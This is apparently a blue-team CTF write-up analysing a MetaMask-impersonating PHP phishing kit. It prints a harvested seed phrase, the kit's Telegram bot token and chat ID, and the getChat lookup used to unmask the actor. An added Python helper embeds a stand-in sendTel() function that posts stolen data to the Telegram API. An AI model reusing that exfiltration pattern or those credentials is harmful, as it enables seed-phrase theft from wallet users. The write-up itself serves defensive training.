GrabThePhisher — CyberDefenders.org

Phishing is an attempt by cybercriminals posing as legitimate institutions, usually via email, to obtain sensitive information from targeted individuals.

Last year (2021), more than 46,000 people reported losing over $1 billion in crypto scams. In this challenge I will work through how cybercriminals abused and compromised a server to impersonate a trusted crypto wallet.

Challenge: https://cyberdefenders.org/blueteam-ctf-challenges/95

Questions and Solutions:

1. Which wallet is used for asking the seed phrase?

A seed phrase, seed recovery phrase or backup seed phrase is a list of words which store all the information needed to recover Bitcoin funds on-chain. Wallet software will typically generate a seed phrase and instruct the user to write it down on paper.

1st: After extracting the zip file, there are multiple files that make up the pieces of a web site. Open up the index HTML and analyze the page, checking every wallet function button. The only one that works is “Metamask”, which responds with another web page.

2nd: In the extracted zip file there is a folder named metamask containing a malicious PHP script.

Solution: Metamask

2. What is the file name that has the code for the phishing kit?

In the extracted files there is a metamask directory. Opening the directory and cat-ing out metamask.php shows, after analyzing the code, the malicious phishing kit code.

Solution: metamask.php

3. In which language was the kit written?

Refer to the file name extension from question 2.

Solution: PHP Language

4. What service does the kit use to retrieve the victim’s machine information?

On the first line of the phishing kit code, as you can see, there is an API request, followed by requests for the geographical location and date.

Sypex Geo is a product for determining the location of a visitor by IP address, from the creators of Sypex Dumper. Having received an IP address, Sypex Geo provides information about the visitor’s location — country, region, city, geographic coordinates.

Solution: Sypex Geo

5. How many seed phrases were already collected?

In the extracted zip file there is a log directory with a log.txt file. Opening the log file, there are only 3 phrases of 12 words each.

Solution: 3

6. Write down the seed phrase of the most recent phishing incident?

The 3rd seed phrase is the most recent.

Solution: father also recycle embody balance concert mechanic believe owner pair muffin hockey

7. Which medium had been used for credential dumping?

This question is too confusing for me. Medium — an agency or means of doing something (synonyms: channel, forum).

In the phishing kit’s sendTel function, the Telegram API is used. Telegram is a freemium, cross-platform, cloud-based instant messaging service.

Solution: Telegram

8. What is the token for the channel?

In the sendTel function there is a token and other strings used.

Solution: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9. What is the chat ID of the phisher’s channel?

In the sendTel function there is an ID and other strings used.

Solution: 5442785564

10. What is the alias of the phish kit developer?

In the script there is a small message complimenting all the hustlers. In the closing regards signature there is a unique alias.

Solution: j1j1b1s@m3r0

11. What is the full name of the Phish Actor?

For this question we can use the Telegram API to extract information based on the functionality the phishing kit code uses. From the phish kit I used the chat ID and the token with the getChat method of the Telegram API. I can now retrieve the developer’s full name and the username used.

Solution: Marcus Aurelius

12. What is the username of the Phish Actor?

Refer to question number 11.
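An added example (my own code, not the write-up’s or the challenge’s) tying together questions 5, 8, 9 and 11: it pulls the bot token and chat ID out of a sendTel()-style snippet, counts the 12-word phrases in a log.txt, and builds the getChat URL without sending it. The PHP snippet, the log lines, the token and the chat ID are all constructed placeholders, not the challenge’s values.

```python
import re
from urllib.parse import urlencode

# Constructed stand-in for the kit's sendTel() function (NOT the challenge's
# metamask.php); the bot token and chat id below are placeholders.
KIT_PHP = r'''
function sendTel($msg) {
    $token = "1234567890:AAEXAMPLEPLACEHOLDERTOKEN0000000000";
    $id = "1122334455";
    $url = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($msg);
    file_get_contents($url);
}
'''

# Constructed stand-in for log/log.txt: one line per visit, seed phrase in the last field.
LOG_TXT = """\
2022-05-20 09:14:02 | 198.51.100.7 | Hamburg, DE | visited
2022-05-20 09:15:40 | 198.51.100.7 | Hamburg, DE | abandon ability able about above absent absorb abstract absurd abuse access accident
2022-05-21 17:03:11 | 203.0.113.9 | Lyon, FR | zoo zone youth young yellow year yard wrong write wrist wrap world
2022-05-22 21:45:56 | 192.0.2.44 | Cebu, PH | canyon effort lizard mobile unfair ivory trap hidden badge merry quantum stable
"""

TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")        # Telegram bot token shape
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*[\"']([^\"']*)[\"']\s*;")  # $var = "literal";

def extract_telegram_config(php: str) -> dict:
    """Recover the bot token and chat id a Telegram-exfil phishing kit posts to."""
    literals = {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(php)}
    token_match = TOKEN_RE.search(php)
    # chat_id is either a literal (chat_id=123) or concatenated from a PHP variable (chat_id=".$id.")
    lit = re.search(r"chat_id=(\d+)", php)
    ref = re.search(r"chat_id=[\"']\s*\.\s*\$(\w+)", php)
    chat_id = lit.group(1) if lit else (literals.get(ref.group(1)) if ref else None)
    return {"token": token_match.group(1) if token_match else None, "chat_id": chat_id}

def getchat_url(token: str, chat_id: str) -> str:
    """Bot API request the write-up uses to identify the channel owner (built here, not sent)."""
    return f"https://api.telegram.org/bot{token}/getChat?{urlencode({'chat_id': chat_id})}"

def harvested_seed_phrases(log: str) -> list:
    """Return the 12-word phrases recorded in the kit's log, oldest first."""
    phrases = []
    for line in log.splitlines():
        words = line.rsplit("|", 1)[-1].split()
        if len(words) == 12 and all(w.isalpha() and w.islower() for w in words):
            phrases.append(" ".join(words))
    return phrases
```

Calling `harvested_seed_phrases(LOG_TXT)` on the constructed log returns three phrases with the newest last, and `getchat_url(**extract_telegram_config(KIT_PHP))` gives the lookup URL to run from an analysis host.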

We must be vigilant about every link we receive.

Thank you for reading this blog post. Dagger out!
